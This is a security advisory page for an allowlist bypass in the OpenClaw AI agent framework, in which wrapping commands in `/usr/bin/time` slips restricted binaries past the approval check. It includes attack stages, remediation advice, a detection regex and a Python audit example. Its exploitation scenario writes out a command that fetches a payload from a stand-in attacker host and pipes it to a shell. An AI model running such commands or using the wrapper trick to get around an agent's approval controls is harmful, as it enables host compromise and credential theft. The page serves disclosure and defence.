CVE-2026-35666: OpenClaw: allowlist bypass enables arbitrary command exec

HIGH
Published April 10, 2026
CISO Take

OpenClaw before 2026.3.22 contains a security bypass in its `system.run` approval mechanism: the allowlist validation checks the `/usr/bin/time` wrapper but never inspects the inner command, allowing any low-privileged user to reuse an existing approval state to execute otherwise-restricted binaries. With a CVSS of 8.8, network-accessible attack vector, low complexity, and no user interaction required, the exploitation barrier is minimal — any authenticated session can weaponize this in seconds. No active exploitation is confirmed and CISA has not added it to KEV, but the technique is trivially reproducible and OpenClaw's ecosystem has a documented history of malicious skill abuse (AIID #1368) that this bypass could directly enable. Patch to 2026.3.22 immediately; if delayed, disable `system.run` or wrap the agent process in a restricted OS user with no write access outside its working directory.

Sources: NVD, GitHub Advisory, ATLAS, VulnCheck

What is the risk?

High risk for any production OpenClaw deployment. The CVSS 8.8 score is well-supported: network reachability (AV:N), low complexity (AC:L), and low privilege requirement (PR:L) combine to make this accessible to any authenticated user — including compromised agent sessions or rogue plugin code. AI agents typically run with elevated OS permissions to perform automation tasks, which amplifies the blast radius well beyond a standard application vulnerability. With 395 prior CVEs in the same package, active security research scrutiny is high, increasing the probability that a weaponized PoC will surface quickly. The absence of EPSS data and public exploits at time of publication provides only marginal comfort.

How does the attack unfold?

Initial Access (AML.T0012): Attacker authenticates to an OpenClaw deployment with low-privilege credentials or compromises an existing agent session or plugin.
Exploitation (AML.T0107): Attacker crafts a `system.run` invocation wrapping a restricted command with `/usr/bin/time`, triggering the approval-state reuse flaw (CWE-706) to bypass the executable allowlist.
Execution (AML.T0053): The inner command executes under the agent's OS identity without triggering any allowlist violation, as only the `time` wrapper is validated.
Impact (AML.T0112.000): Attacker achieves full confidentiality, integrity, and availability compromise of the host system, enabling credential theft, data exfiltration, or persistence within the AI agent environment.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
OpenClaw pip No patch
4 dependents, 37% patched, ~3d to patch

How severe is it?

CVSS 3.1: 8.8 / 10
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

What is the attack surface?

AV: Network
AC: Low
PR: Low
UI: None
S: Unchanged
C: High
I: High
A: High

What should I do?

  1. Upgrade OpenClaw to ≥2026.3.22 (patches in commits 630f147 and 394099b).

  2. If immediate patching is blocked, disable `system.run` entirely or restrict it to a dedicated OS user with a minimal, read-only filesystem view and no network egress.

  3. Detect exploitation attempts by auditing agent execution logs for `time`-prefixed invocations wrapping non-time commands (regex: `\/usr\/bin\/time\s+[^-]`).

  4. Apply OS-level mandatory access control (AppArmor/SELinux) profiles to the OpenClaw process to constrain executable paths independent of application-layer allowlists.

  5. Review GHSA-qm9x-v7cx-7rq4 and apply vendor-recommended configuration hardening if patching is delayed.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Article 15 - Accuracy, robustness and cybersecurity
ISO 42001: A.6.2.5 - AI system security
NIST AI RMF: MANAGE 2.4 - Mechanisms to respond to AI risks
OWASP LLM Top 10: LLM06 - Excessive Agency

Frequently Asked Questions

Is CVE-2026-35666 actively exploited?

No confirmed active exploitation of CVE-2026-35666 has been reported, but organizations should still patch proactively.

What systems are affected by CVE-2026-35666?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, agentic pipelines, AI code execution environments, autonomous task runners.

What is the CVSS score for CVE-2026-35666?

CVE-2026-35666 has a CVSS v3.1 base score of 8.8 (HIGH).

What is the AI security impact?

Affected AI Architectures

agent frameworks, agentic pipelines, AI code execution environments, autonomous task runners

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application
AML.T0053 AI Agent Tool Invocation
AML.T0107 Exploitation for Defense Evasion
AML.T0112.000 Local AI Agent

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2.5
NIST AI RMF: MANAGE 2.4
OWASP LLM Top 10: LLM06

What are the technical details?

Original Advisory

OpenClaw before 2026.3.22 contains an allowlist bypass vulnerability in system.run approvals that fails to unwrap /usr/bin/time wrappers. Attackers can bypass executable binding restrictions by using an unregistered time wrapper to reuse approval state for inner commands.

Exploitation Scenario

An attacker with a low-privilege account or a compromised OpenClaw plugin session identifies that `/usr/bin/time` holds an existing approval or is not on the denylist. They invoke `system.run('/usr/bin/time /bin/bash -c "curl https://attacker.example/payload | sh"')`. The approval engine resolves the executable as `time` (approved), reuses its approval state, and passes execution without evaluating the inner shell command. The payload executes under the agent's OS identity — potentially with access to API keys, cloud credentials, or internal network resources mounted in the agent's environment. In a multi-tenant or shared AI platform context, this could pivot from one tenant's agent session to host-level access.
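A minimal model of the check described above, combined with the log audit from remediation step 3, as an added example (not OpenClaw's code or the advisory's): `unwrap_time` skips GNU `time` options to find the executable that actually runs, and `audit` also records whether the page's regex would have matched the same line. The allowlist contents, the `cmd=` log format and all function names are assumptions, and the log lines are constructed.

```python
import os
import re
import shlex

# GNU time options that consume the next argument (-f FORMAT, -o FILE).
TIME_OPTS_WITH_ARG = {"-f", "--format", "-o", "--output"}
PAGE_REGEX = re.compile(r"\/usr\/bin\/time\s+[^-]")  # regex from the remediation step

def unwrap_time(argv):
    """Strip leading time wrappers and their options; return the inner argv."""
    while argv and os.path.basename(argv[0]) == "time":
        i = 1
        while i < len(argv) and argv[i].startswith("-"):
            if argv[i] == "--":  # explicit end of options
                i += 1
                break
            i += 2 if argv[i] in TIME_OPTS_WITH_ARG else 1
        argv = argv[i:]
    return argv

def naive_allowed(command, allowlist):
    """Model of the flaw: only the outermost executable is checked."""
    argv = shlex.split(command)
    return bool(argv) and argv[0] in allowlist

def unwrapped_allowed(command, allowlist):
    """Check the executable that actually runs once time is unwrapped."""
    inner = unwrap_time(shlex.split(command))
    return bool(inner) and inner[0] in allowlist

def audit(log_lines, allowlist):
    """Return (inner_executable, regex_hit) per wrapped, non-allowlisted command."""
    findings = []
    for line in log_lines:
        argv = shlex.split(line.partition("cmd=")[2])
        inner = unwrap_time(argv)
        if inner != argv and inner and inner[0] not in allowlist:
            findings.append((inner[0], bool(PAGE_REGEX.search(line))))
    return findings

# Constructed sample data: hypothetical allowlist and log format ("... cmd=<command>").
ALLOWLIST = {"/usr/bin/time", "/usr/bin/git"}
SAMPLE_LOG = [
    "2026-04-11T09:00:01Z session=a1 cmd=/usr/bin/git status",
    "2026-04-11T09:00:07Z session=a1 cmd=/usr/bin/time /usr/bin/git fetch",
    "2026-04-11T09:01:12Z session=b2 cmd=/usr/bin/time /bin/bash -c id",
    "2026-04-11T09:01:40Z session=b2 cmd=/usr/bin/time -v -o /tmp/t.log /bin/bash -c id",
]
```

On the sample log the regex matches the direct wrap but not the line where `time` options precede the wrapped command, so a log audit should parse the argument vector rather than rely on the pattern alone.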

Weaknesses (CWE)

CWE-706 — Use of Incorrectly-Resolved Name or Reference: The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

Published: April 10, 2026
Last Modified: June 23, 2026
First Seen: June 23, 2026
